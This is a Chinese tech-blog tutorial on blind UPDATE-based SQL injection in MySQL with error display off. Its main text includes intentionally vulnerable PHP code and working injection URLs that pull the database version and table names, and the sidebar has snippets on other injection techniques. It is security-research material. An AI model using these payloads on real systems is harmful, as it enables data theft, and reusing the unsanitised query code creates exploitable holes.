mysql错误回显注入_update注入关闭报错回显

最新推荐文章于 2024-08-05 12:31:15 发布
最新推荐文章于 2024-08-05 12:31:15 发布
阅读量340 收藏 1
点赞数
文章标签: mysql错误回显注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33226548/article/details/113467319
版权
本文探讨了在MySQL非严格模式下,如何在关闭错误显示时进行Update注入。通过利用MySQL特性,当字符串与数字进行或运算时,结果为数字。文章提供了一个示例代码,展示如何将查询结果转换为数字,再利用unhex()和conv()函数解码获取原始数据。虽然这种方法存在局限性,如数字范围限制和可能的字符过滤,但为安全研究人员提供了一种在特定条件下的注入思路。
摘要由CSDN通过智能技术生成

说明

关于update注入,可能大家最先想到的是报错注入,但是报错注入的前提是开启了错误显示。那如果关闭了报错显示呢?在Update的注入中如果关闭了显错该怎么办这篇文章中提出了一种在关闭报错情况下的注入场景,本篇文章就是对这种原理进行分析,并就一个实际的cms系统进行实际的分析。

mysql的特性

在mysql中,字符串和数组进行或运算时,将得到数字。但是需要注意的是,这个特性需要在MySQL的非严格模式下才可以使用。如下:

mysql> select 'abc'|123;

+-----------+

| 'abc'|123 |

+-----------+

|       123 |

+-----------+

1 row in set, 1 warning (0.00 sec)

mysql> select user()|123;

+------------+

| user()|123 |

+------------+

|        123 |

+------------+

1 row in set (0.00 sec)

利用这种特性,在关闭了报错的情况下就能够将我们查询到的数据转换为十进制的数,然后与字符串进行或运算,得到的结果就是十进制的数,最终转换为对应的字符串即可。

update注入示例

存在如下代码:

$mysqli = new mysqli("localhost","root","root","security");

if($mysqli->connect_errno) {

printf("Connect failed: %s\n",$mysqli->connect_errno);

exit();

}

$mysqli->query("set names utf8");

$id = @$_GET['id'];

$username = @$_GET['username'];

$sql1 = "update users set username='$username' where id='$id'";

var_dump($sql1);

$sql2 = "select * from users where id='$id'";

var_dump($sql2);

$result = $mysqli->query($sql1);

if($result = $mysqli->query($sql2)) {

$row = $result->fetch_array(MYSQLI_ASSOC);

echo "ID=".$id.'的用户名变为'.$row['username'];

$result->close();

} else {

var_dump($mysqli->error);

}

$mysqli->close();

输入一个正常的用户名和ID:

0fcda4367f11d485deaad2187058683d.gif

利用mysql的字符和数字进行或运算的特性,如下:

0fcda4367f11d485deaad2187058683d.gif

得到了数字123456

那么接下来就是注入的过程,我们将需要查询的数据转换为数字,转换的方法就是采用转换为十六进制的方法。

访问test.php?id=1&username=tom'|conv(hex(version()),16,10)|'

0fcda4367f11d485deaad2187058683d.gif

得到这个数据之后接下来就是进行解码,解码的方式使用unhex()即可。如下:

mysql> select unhex(conv(58472576988467,10,16));

+-----------------------------------+

| unhex(conv(58472576988467,10,16)) |

+-----------------------------------+

| 5.5.53                            |

+-----------------------------------+

1 row in set (0.00 sec)

在实际过程中会出现或操作的结果会超过mysql的数字范围导致解码得到的结果不全,是因为将字符串转为十进制之后数值较大超过了mysql的取值范围,比如user()的字符串就存在这样的问题。遇到这种情况就可以使用substr()进行分割。如下:

# 第一次请求得到1到5之间的字符串,

http://localhost/test/test.php?id=1&username=ppp'| conv(hex(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,5)),16,10)|'

# 结果: 435626797420

解码得到:

mysql> select unhex(conv(435626797420,10,16));

+---------------------------------+

| unhex(conv(435626797420,10,16)) |

+---------------------------------+

| email                           |

+---------------------------------+

1 row in set (0.00 sec)

# 第一次请求得到5到10之间的字符串,

http://localhost/test/test.php?id=1&username=ppp'| conv(hex(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,10)),16,10)|'

# 结果: 27763

解码得到:

mysql> select unhex(conv(27763,10,16));

+--------------------------+

| unhex(conv(27763,10,16)) |

+--------------------------+

| ls                       |

+--------------------------+

1 row in set (0.00 sec)

将两次的数据进行组合,得到表名为emails

总结

方式需要update语句配合select查询才能够使用,而且需要在MySQL的非严格模式下才可以使用。

文章仅仅只是提供了update在一种场景下的注入方式,但是还是存在一定的局限性,很多时候select、()、,都会被过滤掉。

文章只是提出了一种注入场景,作为一个安全研究人员应该具备举一反三的能力,而不是局限在这个场景里面。

予晚
关注
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 677
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1280
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
C例子: 关闭终端中的回显功能
07-02
该程序是我写的博客“一起talk C栗子吧(第一百七十回:C语言实例--关闭终端中的回显功能一)”的配套程序,共享给大家使用
mysql source 禁止回显_“禁用”Linux终端输出的回显
weixin_32290249的博客
02-01 459
Termios结构是在POSIX规范中定义的一个标准接口,通过设置termios类型的数据结构中值及相关函数调用便可以对终端接口进行控制。控制终端的输出回显主要用到"本地模式"中可用的c_lflag的宏ECHO,ECHO宏定义为:启用输入字符的本地回显功能此功能最常见的应用莫过于控制输入密码的回显,如通过 $sudo /etc/** 获取管理权限或终端登录MySQL时输入的密码是不会显示出来的。而...
SQL报错注入updatexml
最新发布
2301_78549931的博客
08-05 1135
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
php关闭mysql错误提示_mysql错误提示如何关闭
weixin_33286064的博客
02-08 434
寻觅 beyond2017-09-23 21:41:482楼//关闭所有PHP错误报告error_reporting(0);//Reportsimplerunningerrorserror_reporting(E_ERROR|E_WARNING|E_PARSE);//报告E_NOTICE也挺好(报告未初始化的变量//或者捕获变量名的错误拼写)error_reporting...
在oracle中关闭回显
软件哲学
07-01 2060
在SQLPLUS里:1.不显示 行头set heading off pages 02.不显示行数信息set feedback off3。不在屏幕上显示结果set termout off4、把sql存在文件(aa.sql)里用 @aa.sql的方式运行
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1735
这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
flask mysql sql注入_Python 中如何防止sql注入
weixin_34622572的博客
03-04 1317
前言web漏洞之首莫过于sql了,不管使用哪种语言进行web后端开发,只要使用了关系型数据库,可能都会遇到sql注入攻击问题。那么在Python web开发的过程中sql注入是怎么出现的呢,又是怎么去解决这个问题的?当然,我这里并不想讨论其他语言是如何避免sql注入的,网上关于PHP(博主注:据说是世界上最屌的语言)防注入的各种方法都有,Python的方法其实类似,这里我就举例来说说。起因漏洞产生...
mysql注入ctf_CTF考点总结-sql注入
weixin_36488760的博客
01-28 1117
整理下sql相关知识,查漏补缺(长期更新)常用语句及知识information_schema包含了大量有用的信息,例如下图mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码当前用户:select user()数据库版本:select version() , select @@versi...
mysql+limit+sql注入_sql注入之limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 661
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
基于错误回显的SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
错误回显
qq_37388518的博客
01-16 315
前提:将前面的用户注册案例的时间转化时,抛出运行时异常 在struts.xml中配置回显页面,让其发生错误后还回到这个注册页面,并且给出错误信息 在register.jsp中添加struts的标签 那么当出现错误的时候就会把出现错误错误信息抛出到这个标签内部 这里面注意,错误必须抛出,要不然不会回显 ...
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
mysql source 禁止回显_项目前端长时间不操作就会断掉
weixin_34665627的博客
02-01 297
环境信息 (必填)pigx版本: 3.11是否修改包名: 企业定制包名,未修改描述(无法理解工单,将直接关闭)日志、截图、回显步项目前端请求后台 时间长不操作就会报错刷新好几遍然后才可以进行正常操作 后台也有报错信息 显示远程主机强迫关闭了一个现有的连接。 还得帮忙看下原因项目前端请求后台 时间长不操作就会报错刷新好几遍然后才可以进行正常操作 后台也有报错信息 显示远程主机强迫关闭了一...
mysql 报错页面_数据库(MySQL)意外报错出现在页面上的问题?
weixin_28769989的博客
02-04 228
框架中如何禁止数据库(MySQL)意外报错?比如说我这边有两个excel表格上传功能,当然我两个地方,写的excel接收数据的处理方法不一样,但是你知道,数据库中有些字段的名称不能为空,如果两个地方的excel文件互相对调上传,那么这个时候就会出现sql报错,就像下图这样:如果我每个接收字段的数据,都要对应数据库做不能为空判断,岂不是太麻烦?我一个excel表格上传功能,只单单对应的一个方法,也就...
SpringMVC处理自定义异常,通过读取配置文件把错误信息显示在前台页面
weixin_33766805的博客
10-16 1049
为什么80%的码农都做不了架构师?>>> ...
MySQL注入错误回显
震山的博客
09-07 331
利用错误回显来获取重要信息
uni 单选回显数据_uniapp开发h5链接(ios内使用)
05-26
在uni-app中,可以使用`v-model`指令来实现单选回显数据。具体实现方法如下: 1. 在data中定义一个变量,用于存储用户选择的值。 ```js data() { return { selectedValue: '' // 存储用户选择的值 } } ``` 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值